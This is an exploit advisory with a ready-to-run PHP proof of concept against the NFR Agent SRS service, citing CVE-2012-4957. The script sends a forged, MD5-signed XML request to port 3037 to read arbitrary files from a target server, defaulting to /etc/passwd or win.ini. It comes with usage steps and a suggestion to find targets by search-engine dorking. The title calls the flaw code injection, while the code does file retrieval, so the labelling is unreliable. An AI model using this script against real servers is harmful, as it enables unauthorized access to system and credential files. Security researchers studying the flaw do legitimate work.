=============================================================================================================================================
| # Title     : NFR Agent SRS Record 1.0.4.3 PHP Code Injection Vulnerability                                                               |
| # Author    : indoushka                                                                                                                   |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits)                                                            |
| # Vendor    : https://documentation.n-able.com/remote-management/userguide/Content/agentreleasenotes.htm                                  |
=============================================================================================================================================

POC :

[+] Dorking İn Google Or Other Search Enggine.

[+] Code Description: This code is written in PHP and aims to exploit a vulnerability in the NFR Agent to retrieve any file from the targeted server.
	
	( https://packetstorm.news/files/id/181031/	CVE-2012-4957 )
	
[+] save code as poc.php.

[+] Set Target : line 49

[+] USage : php poc.php 

[+] PayLoad :

<?php

class NFRFileRetriever {
    private $host;
    private $port;
    private $ssl;
    private $remoteFile;

    public function __construct($host, $port = 3037, $ssl = true, $remoteFile = null) {
        $this->host = $host;
        $this->port = $port;
        $this->ssl = $ssl;
        $this->remoteFile = $remoteFile ?: (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN' ? 'C:\\Windows\\win.ini' : '/etc/passwd');
    }

    private function generateMessage() {
        $record = "<RECORD><NAME>SRS</NAME><OPERATION>4</OPERATION><CMD>103</CMD><PATH>" . $this->remoteFile . "</PATH></RECORD>";
        $md5 = strtoupper(md5("SRS" . $record . "SERVER"));
        return $md5 . $record;
    }

    public function retrieveFile() {
        $url = ($this->ssl ? "https" : "http") . "://" . $this->host . ":" . $this->port . "/FSF/CMD";
        
        $message = $this->generateMessage();

        $options = [
            'http' => [
                'header'  => "Content-Type: text/xml\r\n",
                'method'  => 'POST',
                'content' => $message
            ]
        ];
        
        $context = stream_context_create($options);
        $response = file_get_contents($url, false, $context);
        
        if ($response && strpos($response, "<RESULT>") === false) {
            $fileName = basename($this->remoteFile);
            file_put_contents($fileName, $response);
            echo "[+] " . $this->remoteFile . " saved as " . $fileName . "\n";
        } else {
            echo "[-] Failed to retrieve the file contents\n";
        }
    }
}

// مثال للاستخدام:
$retriever = new NFRFileRetriever('target_ip');
$retriever->retrieveFile();


Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================